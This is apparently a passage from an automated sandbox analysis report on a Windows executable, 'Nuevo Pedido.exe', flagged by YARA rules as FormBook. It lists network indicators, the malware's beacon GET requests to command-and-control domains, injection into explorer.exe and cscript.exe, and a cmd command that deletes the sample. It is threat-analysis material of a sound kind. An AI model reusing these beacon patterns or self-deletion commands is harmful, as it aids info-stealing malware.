                                .reloc0x700000xc0x200False0.041015625data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountry
                                RT_VERSION0x6e0900x35cdata
                                RT_MANIFEST0x6e3fc0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                Imports

                                DLLImport
                                mscoree.dll_CorExeMain

                                Version Infos

                                DescriptionData
                                Translation0x0000 0x04b0
                                LegalCopyrightCopyright Rogers Peet
                                Assembly Version8.0.6.0
                                InternalNameMethodImplAttribut.exe
                                FileVersion5.6.0.0
                                CompanyNameRogers Peet
                                LegalTrademarks
                                Comments
                                ProductNameBiblan
                                ProductVersion5.6.0.0
                                FileDescriptionBiblan
                                OriginalFilenameMethodImplAttribut.exe

                                Network Behavior

                                Snort IDS Alerts

                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                11/25/21-15:10:30.664595TCP1201ATTACK-RESPONSES 403 Forbidden8049784185.53.178.53192.168.2.5
                                11/25/21-15:11:10.632399TCP1201ATTACK-RESPONSES 403 Forbidden8049839185.53.179.91192.168.2.5

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Nov 25, 2021 15:10:30.605460882 CET4978480192.168.2.5185.53.178.53
                                Nov 25, 2021 15:10:30.622345924 CET8049784185.53.178.53192.168.2.5
                                Nov 25, 2021 15:10:30.623855114 CET4978480192.168.2.5185.53.178.53
                                Nov 25, 2021 15:10:30.641732931 CET8049784185.53.178.53192.168.2.5
                                Nov 25, 2021 15:10:30.644892931 CET4978480192.168.2.5185.53.178.53
                                Nov 25, 2021 15:10:30.664511919 CET8049784185.53.178.53192.168.2.5
                                Nov 25, 2021 15:10:30.664594889 CET8049784185.53.178.53192.168.2.5
                                Nov 25, 2021 15:10:30.664649963 CET8049784185.53.178.53192.168.2.5
                                Nov 25, 2021 15:10:30.664774895 CET4978480192.168.2.5185.53.178.53
                                Nov 25, 2021 15:10:30.664819956 CET4978480192.168.2.5185.53.178.53
                                Nov 25, 2021 15:10:30.682296038 CET8049784185.53.178.53192.168.2.5
                                Nov 25, 2021 15:10:35.726473093 CET4978680192.168.2.53.64.163.50
                                Nov 25, 2021 15:10:35.746747017 CET80497863.64.163.50192.168.2.5
                                Nov 25, 2021 15:10:35.746944904 CET4978680192.168.2.53.64.163.50
                                Nov 25, 2021 15:10:35.747081041 CET4978680192.168.2.53.64.163.50
                                Nov 25, 2021 15:10:35.767386913 CET80497863.64.163.50192.168.2.5
                                Nov 25, 2021 15:10:35.767437935 CET80497863.64.163.50192.168.2.5
                                Nov 25, 2021 15:10:35.767457962 CET80497863.64.163.50192.168.2.5
                                Nov 25, 2021 15:10:35.767685890 CET4978680192.168.2.53.64.163.50
                                Nov 25, 2021 15:10:35.767745972 CET4978680192.168.2.53.64.163.50
                                Nov 25, 2021 15:10:35.788788080 CET80497863.64.163.50192.168.2.5
                                Nov 25, 2021 15:10:46.187716007 CET4981680192.168.2.5209.17.116.163
                                Nov 25, 2021 15:10:49.194947958 CET4981680192.168.2.5209.17.116.163
                                Nov 25, 2021 15:10:49.309931040 CET8049816209.17.116.163192.168.2.5
                                Nov 25, 2021 15:10:49.310199976 CET4981680192.168.2.5209.17.116.163
                                Nov 25, 2021 15:10:49.310664892 CET4981680192.168.2.5209.17.116.163
                                Nov 25, 2021 15:10:49.426548958 CET8049816209.17.116.163192.168.2.5
                                Nov 25, 2021 15:10:49.426577091 CET8049816209.17.116.163192.168.2.5
                                Nov 25, 2021 15:10:49.426889896 CET4981680192.168.2.5209.17.116.163
                                Nov 25, 2021 15:10:49.427073956 CET4981680192.168.2.5209.17.116.163
                                Nov 25, 2021 15:10:49.541748047 CET8049816209.17.116.163192.168.2.5
                                Nov 25, 2021 15:10:59.691447973 CET4983880192.168.2.5192.232.250.147
                                Nov 25, 2021 15:10:59.895230055 CET8049838192.232.250.147192.168.2.5
                                Nov 25, 2021 15:10:59.895332098 CET4983880192.168.2.5192.232.250.147
                                Nov 25, 2021 15:10:59.895478964 CET4983880192.168.2.5192.232.250.147
                                Nov 25, 2021 15:11:00.097284079 CET8049838192.232.250.147192.168.2.5
                                Nov 25, 2021 15:11:00.399027109 CET4983880192.168.2.5192.232.250.147
                                Nov 25, 2021 15:11:00.648233891 CET8049838192.232.250.147192.168.2.5
                                Nov 25, 2021 15:11:01.556123972 CET8049838192.232.250.147192.168.2.5
                                Nov 25, 2021 15:11:01.556169987 CET8049838192.232.250.147192.168.2.5
                                Nov 25, 2021 15:11:01.556250095 CET4983880192.168.2.5192.232.250.147
                                Nov 25, 2021 15:11:01.556274891 CET4983880192.168.2.5192.232.250.147
                                Nov 25, 2021 15:11:10.581495047 CET4983980192.168.2.5185.53.179.91
                                Nov 25, 2021 15:11:10.598289013 CET8049839185.53.179.91192.168.2.5
                                Nov 25, 2021 15:11:10.598505020 CET4983980192.168.2.5185.53.179.91
                                Nov 25, 2021 15:11:10.615405083 CET8049839185.53.179.91192.168.2.5
                                Nov 25, 2021 15:11:10.615487099 CET4983980192.168.2.5185.53.179.91
                                Nov 25, 2021 15:11:10.632355928 CET8049839185.53.179.91192.168.2.5
                                Nov 25, 2021 15:11:10.632399082 CET8049839185.53.179.91192.168.2.5
                                Nov 25, 2021 15:11:10.632415056 CET8049839185.53.179.91192.168.2.5
                                Nov 25, 2021 15:11:10.632605076 CET4983980192.168.2.5185.53.179.91
                                Nov 25, 2021 15:11:10.632667065 CET4983980192.168.2.5185.53.179.91
                                Nov 25, 2021 15:11:10.649518013 CET8049839185.53.179.91192.168.2.5

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Nov 25, 2021 15:10:28.557399035 CET5712853192.168.2.58.8.8.8
                                Nov 25, 2021 15:10:29.541821003 CET5712853192.168.2.58.8.8.8
                                Nov 25, 2021 15:10:30.537902117 CET5712853192.168.2.58.8.8.8
                                Nov 25, 2021 15:10:30.595156908 CET53571288.8.8.8192.168.2.5
                                Nov 25, 2021 15:10:35.684943914 CET5046353192.168.2.58.8.8.8
                                Nov 25, 2021 15:10:35.723468065 CET53504638.8.8.8192.168.2.5
                                Nov 25, 2021 15:10:40.778733969 CET5853053192.168.2.58.8.8.8
                                Nov 25, 2021 15:10:40.961405993 CET53585308.8.8.8192.168.2.5
                                Nov 25, 2021 15:10:46.014628887 CET5381353192.168.2.58.8.8.8
                                Nov 25, 2021 15:10:46.186077118 CET53538138.8.8.8192.168.2.5
                                Nov 25, 2021 15:10:54.439486027 CET5734453192.168.2.58.8.8.8
                                Nov 25, 2021 15:10:54.490019083 CET53573448.8.8.8192.168.2.5
                                Nov 25, 2021 15:10:59.496768951 CET5445053192.168.2.58.8.8.8
                                Nov 25, 2021 15:10:59.690080881 CET53544508.8.8.8192.168.2.5
                                Nov 25, 2021 15:11:05.443424940 CET5926153192.168.2.58.8.8.8
                                Nov 25, 2021 15:11:05.481781960 CET53592618.8.8.8192.168.2.5
                                Nov 25, 2021 15:11:10.502841949 CET5715153192.168.2.58.8.8.8
                                Nov 25, 2021 15:11:10.580288887 CET53571518.8.8.8192.168.2.5
                                Nov 25, 2021 15:11:21.011703014 CET6051653192.168.2.58.8.8.8
                                Nov 25, 2021 15:11:21.075328112 CET53605168.8.8.8192.168.2.5

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                Nov 25, 2021 15:10:28.557399035 CET192.168.2.58.8.8.80xb6eeStandard query (0)www.tremblock.comA (IP address)IN (0x0001)
                                Nov 25, 2021 15:10:29.541821003 CET192.168.2.58.8.8.80xb6eeStandard query (0)www.tremblock.comA (IP address)IN (0x0001)
                                Nov 25, 2021 15:10:30.537902117 CET192.168.2.58.8.8.80xb6eeStandard query (0)www.tremblock.comA (IP address)IN (0x0001)
                                Nov 25, 2021 15:10:35.684943914 CET192.168.2.58.8.8.80x71a6Standard query (0)www.rcepjobs.comA (IP address)IN (0x0001)
                                Nov 25, 2021 15:10:40.778733969 CET192.168.2.58.8.8.80x9af3Standard query (0)www.sosibibyslot.websiteA (IP address)IN (0x0001)
                                Nov 25, 2021 15:10:46.014628887 CET192.168.2.58.8.8.80x9e9cStandard query (0)www.downingmunroe.onlineA (IP address)IN (0x0001)
                                Nov 25, 2021 15:10:54.439486027 CET192.168.2.58.8.8.80x579aStandard query (0)www.blueprintroslyn.comA (IP address)IN (0x0001)
                                Nov 25, 2021 15:10:59.496768951 CET192.168.2.58.8.8.80xcd40Standard query (0)www.thejohnmatt.comA (IP address)IN (0x0001)
                                Nov 25, 2021 15:11:05.443424940 CET192.168.2.58.8.8.80x841dStandard query (0)www.securebankofamericalog.siteA (IP address)IN (0x0001)
                                Nov 25, 2021 15:11:10.502841949 CET192.168.2.58.8.8.80xdf5dStandard query (0)www.onlinedatingthaiweb.comA (IP address)IN (0x0001)
                                Nov 25, 2021 15:11:21.011703014 CET192.168.2.58.8.8.80x5040Standard query (0)www.trenddoffical.comA (IP address)IN (0x0001)

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                Nov 25, 2021 15:10:30.595156908 CET8.8.8.8192.168.2.50xb6eeNo error (0)www.tremblock.com185.53.178.53A (IP address)IN (0x0001)
                                Nov 25, 2021 15:10:35.723468065 CET8.8.8.8192.168.2.50x71a6No error (0)www.rcepjobs.com3.64.163.50A (IP address)IN (0x0001)
                                Nov 25, 2021 15:10:40.961405993 CET8.8.8.8192.168.2.50x9af3Name error (3)www.sosibibyslot.websitenonenoneA (IP address)IN (0x0001)
                                Nov 25, 2021 15:10:46.186077118 CET8.8.8.8192.168.2.50x9e9cNo error (0)www.downingmunroe.online209.17.116.163A (IP address)IN (0x0001)
                                Nov 25, 2021 15:10:54.490019083 CET8.8.8.8192.168.2.50x579aName error (3)www.blueprintroslyn.comnonenoneA (IP address)IN (0x0001)
                                Nov 25, 2021 15:10:59.690080881 CET8.8.8.8192.168.2.50xcd40No error (0)www.thejohnmatt.comthejohnmatt.comCNAME (Canonical name)IN (0x0001)
                                Nov 25, 2021 15:10:59.690080881 CET8.8.8.8192.168.2.50xcd40No error (0)thejohnmatt.com192.232.250.147A (IP address)IN (0x0001)
                                Nov 25, 2021 15:11:05.481781960 CET8.8.8.8192.168.2.50x841dName error (3)www.securebankofamericalog.sitenonenoneA (IP address)IN (0x0001)
                                Nov 25, 2021 15:11:10.580288887 CET8.8.8.8192.168.2.50xdf5dNo error (0)www.onlinedatingthaiweb.com185.53.179.91A (IP address)IN (0x0001)
                                Nov 25, 2021 15:11:21.075328112 CET8.8.8.8192.168.2.50x5040Name error (3)www.trenddoffical.comnonenoneA (IP address)IN (0x0001)

                                HTTP Request Dependency Graph

                                • www.tremblock.com
                                • www.rcepjobs.com
                                • www.downingmunroe.online
                                • www.thejohnmatt.com
                                • www.onlinedatingthaiweb.com

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                0192.168.2.549784185.53.178.5380C:\Windows\explorer.exe
                                TimestampkBytes transferredDirectionData
                                Nov 25, 2021 15:10:30.644892931 CET9620OUTGET /udeh/?2dYxhfjx=E9wG6DB+gJGrCrA7N2npAfbzd/MNcvRP0YSWLCgDnz2mMEe2tMuLmGDUaa3MX32MwTcI&s6AD=5jltOBY8-rN HTTP/1.1
                                Host: www.tremblock.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Nov 25, 2021 15:10:30.664594889 CET9620INHTTP/1.1 403 Forbidden
                                Server: nginx
                                Date: Thu, 25 Nov 2021 14:10:30 GMT
                                Content-Type: text/html
                                Content-Length: 146
                                Connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                1192.168.2.5497863.64.163.5080C:\Windows\explorer.exe
                                TimestampkBytes transferredDirectionData
                                Nov 25, 2021 15:10:35.747081041 CET14112OUTGET /udeh/?2dYxhfjx=Sh2Frx7Ne5Gbf0GZF0aHN0EyZlj99LhHOr4v0jLu0VOTkpyLoQ3tHVxja8cQ+qoaRshC&s6AD=5jltOBY8-rN HTTP/1.1
                                Host: www.rcepjobs.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Nov 25, 2021 15:10:35.767437935 CET14112INHTTP/1.1 410 Gone
                                Server: openresty
                                Date: Thu, 25 Nov 2021 14:10:35 GMT
                                Content-Type: text/html
                                Transfer-Encoding: chunked
                                Connection: close
                                Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 63 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 72 63 65 70 6a 6f 62 73 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 38 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 72 63 65 70 6a 6f 62 73 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 7<html>9 <head>4c <meta http-equiv='refresh' content='5; url=http://www.rcepjobs.com/' />a </head>9 <body>38 You are being redirected to http://www.rcepjobs.coma </body>8</html>0


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                2192.168.2.549816209.17.116.16380C:\Windows\explorer.exe
                                TimestampkBytes transferredDirectionData
                                Nov 25, 2021 15:10:49.310664892 CET15995OUTGET /udeh/?2dYxhfjx=XsaaYVs5B+09RIkVBuB9uz7A4nUjKuiPTgX8t5JQ0XDGnKq9QQr8GjRKS5XBt9MDEtTg&s6AD=5jltOBY8-rN HTTP/1.1
                                Host: www.downingmunroe.online
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Nov 25, 2021 15:10:49.426548958 CET15996INHTTP/1.1 400 Bad Request
                                Server: openresty/1.17.8.2
                                Date: Thu, 25 Nov 2021 14:10:49 GMT
                                Content-Type: text/html
                                Content-Length: 163
                                Connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 37 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.17.8.2</center></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                3192.168.2.549838192.232.250.14780C:\Windows\explorer.exe
                                TimestampkBytes transferredDirectionData
                                Nov 25, 2021 15:10:59.895478964 CET16019OUTGET /udeh/?2dYxhfjx=ov0JDamFDTMX/NINQ6dXBWp9D4Bna97YEIhf43toIE+QttJEvvSyuVruiBSF6Ny2F/6R&s6AD=5jltOBY8-rN HTTP/1.1
                                Host: www.thejohnmatt.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Nov 25, 2021 15:11:01.556123972 CET16020INHTTP/1.1 301 Moved Permanently
                                Date: Thu, 25 Nov 2021 14:11:01 GMT
                                Server: nginx/1.17.9
                                Content-Type: text/html; charset=UTF-8
                                Content-Length: 0
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                X-Redirect-By: WordPress
                                Location: http://thejohnmatt.com/udeh/?2dYxhfjx=ov0JDamFDTMX/NINQ6dXBWp9D4Bna97YEIhf43toIE+QttJEvvSyuVruiBSF6Ny2F/6R&s6AD=5jltOBY8-rN
                                X-Endurance-Cache-Level: 0
                                X-nginx-cache: WordPress
                                X-Server-Cache: true
                                X-Proxy-Cache: MISS


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                4192.168.2.549839185.53.179.9180C:\Windows\explorer.exe
                                TimestampkBytes transferredDirectionData
                                Nov 25, 2021 15:11:10.615487099 CET16021OUTGET /udeh/?2dYxhfjx=WESqUOlrd4N7F4Vkh8SPM0KezyJ+WDn1u3Qqm333AtEi2E+6MV6LR8TxaNrvEi0KysNf&s6AD=5jltOBY8-rN HTTP/1.1
                                Host: www.onlinedatingthaiweb.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Nov 25, 2021 15:11:10.632399082 CET16021INHTTP/1.1 403 Forbidden
                                Server: nginx
                                Date: Thu, 25 Nov 2021 14:11:10 GMT
                                Content-Type: text/html
                                Content-Length: 146
                                Connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                Code Manipulations

                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                Analysis Process: Nuevo Pedido.exe PID: 6320 Parent PID: 572

                                General

                                Start time:15:09:07
                                Start date:25/11/2021
                                Path:C:\Users\user\Desktop\Nuevo Pedido.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\Nuevo Pedido.exe"
                                Imagebase:0xa80000
                                File size:444928 bytes
                                MD5 hash:159C46C59CD8ECB7A2BCE707DE1BC370
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.241689369.0000000002E3A000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmp, Author: Joe Security
                                Reputation:low

                                Chronological Activities

                                Analysis Process: Nuevo Pedido.exe PID: 6464 Parent PID: 6320

                                General

                                Start time:15:09:10
                                Start date:25/11/2021
                                Path:C:\Users\user\Desktop\Nuevo Pedido.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\Desktop\Nuevo Pedido.exe
                                Imagebase:0xde0000
                                File size:444928 bytes
                                MD5 hash:159C46C59CD8ECB7A2BCE707DE1BC370
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:low

                                Chronological Activities

                                Analysis Process: explorer.exe PID: 3472 Parent PID: 6464

                                General

                                Start time:15:09:12
                                Start date:25/11/2021
                                Path:C:\Windows\explorer.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\Explorer.EXE
                                Imagebase:0x7ff693d90000
                                File size:3933184 bytes
                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:high

                                Chronological Activities

                                Analysis Process: cscript.exe PID: 6536 Parent PID: 3472

                                General

                                Start time:15:09:37
                                Start date:25/11/2021
                                Path:C:\Windows\SysWOW64\cscript.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\cscript.exe
                                Imagebase:0xa50000
                                File size:143360 bytes
                                MD5 hash:00D3041E47F99E48DD5FFFEDF60F6304
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:moderate

                                Chronological Activities

                                Analysis Process: cmd.exe PID: 6420 Parent PID: 6536

                                General

                                Start time:15:09:44
                                Start date:25/11/2021
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:/c del "C:\Users\user\Desktop\Nuevo Pedido.exe"
                                Imagebase:0x150000
                                File size:232960 bytes
                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Chronological Activities

                                Analysis Process: conhost.exe PID: 6668 Parent PID: 6420

                                General

                                Start time:15:09:45
                                Start date:25/11/2021
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7ecfc0000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Chronological Activities

                                Disassembly

                                Code Analysis

                                Reset < >

                                  Analysis Process: Nuevo Pedido.exe PID: 6320 Parent PID: 572 Nuevo Pedido.exeCOMMON

                                  Executed Functions

                                  Function 02BCD2F8, Relevance: 2.5, Strings: 1, Instructions: 1291COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.241476862.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: d
                                  • API String ID: 0-2564639436
